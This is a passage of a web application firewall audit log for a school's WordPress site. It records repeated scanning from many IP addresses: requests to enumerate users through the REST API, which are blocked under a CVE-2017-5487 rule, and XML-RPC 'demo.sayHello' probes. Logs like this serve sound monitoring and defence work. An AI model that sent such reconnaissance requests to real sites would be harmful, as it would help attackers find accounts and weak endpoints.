1746666089732879 5092; combined=3949, p1=507, p2=3234, p3=26, p4=26, p5=92, sr=67, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae6a2370-Z-- --923ae157-A-- [08/May/2025:08:05:00 +0700] aBwDPMP9GxxPAbCroFbMogAAAEw 103.236.140.4 42216 103.236.140.4 8181 --923ae157-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --923ae157-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --923ae157-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746666300684666 3278 (- - -) Stopwatch2: 1746666300684666 3278; combined=1437, p1=497, p2=906, p3=0, p4=0, p5=33, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --923ae157-Z-- --d79c9a41-A-- [08/May/2025:08:05:19 +0700] aBwDT6cs1DvJ_HgMHE_xmAAAAAU 103.236.140.4 42222 103.236.140.4 8181 --d79c9a41-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d79c9a41-C-- demo.sayHello --d79c9a41-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d79c9a41-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746666319400835 6825 (- - -) Stopwatch2: 1746666319400835 6825; combined=4883, p1=677, p2=3995, p3=32, p4=57, p5=72, sr=139, sw=50, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d79c9a41-Z-- --eff9bc7c-A-- [08/May/2025:08:33:48 +0700] aBwJ_I4K347NtBcwXKwFhwAAAIs 103.236.140.4 42316 103.236.140.4 8181 --eff9bc7c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eff9bc7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eff9bc7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668028202581 3409 (- - -) Stopwatch2: 1746668028202581 3409; combined=1501, p1=521, p2=943, p3=0, p4=0, p5=36, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eff9bc7c-Z-- --71ce607a-A-- [08/May/2025:08:34:08 +0700] aBwKEMP9GxxPAbCroFbMrwAAAE0 103.236.140.4 42320 103.236.140.4 8181 --71ce607a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71ce607a-C-- demo.sayHello --71ce607a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71ce607a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746668048373194 6507 (- - -) Stopwatch2: 1746668048373194 6507; combined=4568, p1=608, p2=3743, p3=57, p4=35, p5=74, sr=76, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71ce607a-Z-- --937b8b07-A-- [08/May/2025:08:35:09 +0700] aBwKTSs5rYyn3jlLjjK-4gAAAMA 103.236.140.4 42328 103.236.140.4 8181 --937b8b07-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --937b8b07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --937b8b07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668109656202 3361 (- - -) Stopwatch2: 1746668109656202 3361; combined=1491, p1=488, p2=914, p3=0, p4=0, p5=89, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --937b8b07-Z-- --8aed226d-A-- [08/May/2025:08:35:18 +0700] aBwKVo4K347NtBcwXKwFigAAAJQ 103.236.140.4 42332 103.236.140.4 8181 --8aed226d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8aed226d-C-- demo.sayHello --8aed226d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8aed226d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746668118263844 17053 (- - -) Stopwatch2: 1746668118263844 17053; combined=26574, p1=560, p2=3502, p3=33, p4=85, p5=11213, sr=78, sw=62, l=0, gc=11119 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8aed226d-Z-- --294dfb73-A-- [08/May/2025:08:47:52 +0700] aBwNSI4K347NtBcwXKwFkgAAAII 103.236.140.4 42488 103.236.140.4 8181 --294dfb73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --294dfb73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --294dfb73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668872303603 3078 (- - -) Stopwatch2: 1746668872303603 3078; combined=1272, p1=426, p2=815, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --294dfb73-Z-- --9d07ea4f-A-- [08/May/2025:08:47:58 +0700] aBwNTqcs1DvJ_HgMHE_xqAAAAAo 103.236.140.4 42498 103.236.140.4 8181 --9d07ea4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9d07ea4f-C-- demo.sayHello --9d07ea4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d07ea4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746668878324117 4099 (- - -) Stopwatch2: 1746668878324117 4099; combined=3286, p1=429, p2=2689, p3=27, p4=33, p5=65, sr=52, sw=43, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d07ea4f-Z-- --16d6531d-A-- [08/May/2025:08:48:36 +0700] aBwNdKcs1DvJ_HgMHE_xqgAAABA 103.236.140.4 42502 103.236.140.4 8181 --16d6531d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --16d6531d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16d6531d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668916013273 2762 (- - -) Stopwatch2: 1746668916013273 2762; combined=1213, p1=404, p2=781, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16d6531d-Z-- --49f12d59-A-- [08/May/2025:08:48:41 +0700] aBwNeacs1DvJ_HgMHE_xrAAAABU 103.236.140.4 42506 103.236.140.4 8181 --49f12d59-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --49f12d59-C-- demo.sayHello --49f12d59-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --49f12d59-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746668921752771 4970 (- - -) Stopwatch2: 1746668921752771 4970; combined=3870, p1=479, p2=3128, p3=25, p4=85, p5=90, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49f12d59-Z-- --81564309-A-- [08/May/2025:08:48:54 +0700] aBwNhqcs1DvJ_HgMHE_xrQAAAA8 103.236.140.4 42510 103.236.140.4 8181 --81564309-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --81564309-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81564309-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668934403449 2915 (- - -) Stopwatch2: 1746668934403449 2915; combined=1278, p1=447, p2=801, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81564309-Z-- --77544307-A-- [08/May/2025:08:49:01 +0700] aBwNjcP9GxxPAbCroFbMvAAAAEw 103.236.140.4 42514 103.236.140.4 8181 --77544307-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.83 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --77544307-C-- demo.sayHello --77544307-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --77544307-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746668941851636 5049 (- - -) Stopwatch2: 1746668941851636 5049; combined=3461, p1=619, p2=2652, p3=43, p4=34, p5=68, sr=78, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77544307-Z-- --01e2be12-A-- [08/May/2025:08:49:19 +0700] aBwNn6cs1DvJ_HgMHE_xrwAAAAA 103.236.140.4 42518 103.236.140.4 8181 --01e2be12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --01e2be12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01e2be12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668959078318 3057 (- - -) Stopwatch2: 1746668959078318 3057; combined=1290, p1=432, p2=829, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01e2be12-Z-- --d97e5954-A-- [08/May/2025:08:49:26 +0700] aBwNpqcs1DvJ_HgMHE_xsQAAAAQ 103.236.140.4 42522 103.236.140.4 8181 --d97e5954-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d97e5954-C-- demo.sayHello --d97e5954-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d97e5954-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746668966844103 4969 (- - -) Stopwatch2: 1746668966844103 4969; combined=3823, p1=491, p2=3126, p3=25, p4=27, p5=91, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d97e5954-Z-- --7dec1d30-A-- [08/May/2025:08:49:58 +0700] aBwNxqcs1DvJ_HgMHE_xswAAAAI 103.236.140.4 42526 103.236.140.4 8181 --7dec1d30-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7dec1d30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dec1d30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668998267204 3501 (- - -) Stopwatch2: 1746668998267204 3501; combined=1458, p1=475, p2=945, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dec1d30-Z-- --778e3741-A-- [08/May/2025:08:50:00 +0700] aBwNyCs5rYyn3jlLjjK_AgAAANU 103.236.140.4 42528 103.236.140.4 8181 --778e3741-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --778e3741-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --778e3741-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669000612075 2647 (- - -) Stopwatch2: 1746669000612075 2647; combined=1178, p1=425, p2=715, p3=0, p4=0, p5=37, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --778e3741-Z-- --fc123f73-A-- [08/May/2025:08:50:03 +0700] aBwNy44K347NtBcwXKwFlQAAAIs 103.236.140.4 42534 103.236.140.4 8181 --fc123f73-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc123f73-C-- demo.sayHello --fc123f73-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc123f73-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 